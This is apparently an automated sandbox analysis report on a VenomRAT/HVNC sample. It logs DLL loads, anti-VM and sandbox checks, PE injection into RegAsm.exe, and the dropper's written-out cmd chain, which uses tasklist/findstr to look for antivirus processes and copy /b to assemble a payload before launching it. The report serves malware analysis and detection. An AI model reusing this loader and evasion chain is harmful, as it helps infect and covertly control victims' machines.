                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: devenum.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: msdmo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: mmdevapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: OR8Ti8rf8h.exeStatic file information: File size 3391331 > 1048576
                    Source: OR8Ti8rf8h.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 11.30.2024\HVNCDll\obj\Release\hvnc.pdbP source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp
                    Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000E.00000000.1908601175.0000000000D92000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe.11.dr
                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000E.00000000.1908601175.0000000000D92000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe.11.dr
                    Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 11.30.2024\HVNCDll\obj\Release\hvnc.pdb source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                    Source: OR8Ti8rf8h.exeStatic PE information: real checksum: 0x345ed5 should be: 0x33f00c

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\585711\Depression.comJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\585711\Depression.comJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comFile created: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeJump to dropped file

                    Boot Survival

                    barindex
                    Yara detected VenomRAT
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Yara detected VenomRAT
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeMemory allocated: 3420000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeWindow / User API: threadDelayed 1003Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeWindow / User API: threadDelayed 8839Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe TID: 7688Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe TID: 8016Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\585711Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\585711\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                    Source: RegAsm.exe, 0000000E.00000002.2629872593.0000000001829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
                    Source: RegAsm.exe, 0000000E.00000002.2633955559.00000000059E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comMemory written: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe base: 1170000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comMemory written: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe base: 1170000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comMemory written: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe base: F7F000Jump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmdJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585711Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ComplyFailuresGuardsDomInvolvementRadarScreensKidney" Tonight Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Solaris + ..\Harassment + ..\Proudly + ..\Turned + ..\Viruses + ..\Wallpapers + ..\Usc + ..\Crm + ..\Ribbon + ..\Confident + ..\Angle + ..\Alumni + ..\Fees + ..\Reserve + ..\Reflected + ..\Include + ..\Specialist + ..\Respondent + ..\False + ..\Assume + ..\Regardless + ..\Mary + ..\Consecutive + ..\Movers + ..\Scottish + ..\Holocaust + ..\Experience + ..\Phrase + ..\Started + ..\Disturbed + ..\Needle + ..\Pipes + ..\Hollow + ..\Spelling + ..\Reed + ..\Tft + ..\Specialties YJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\585711\Depression.com Depression.com YJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comProcess created: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeJump to behavior
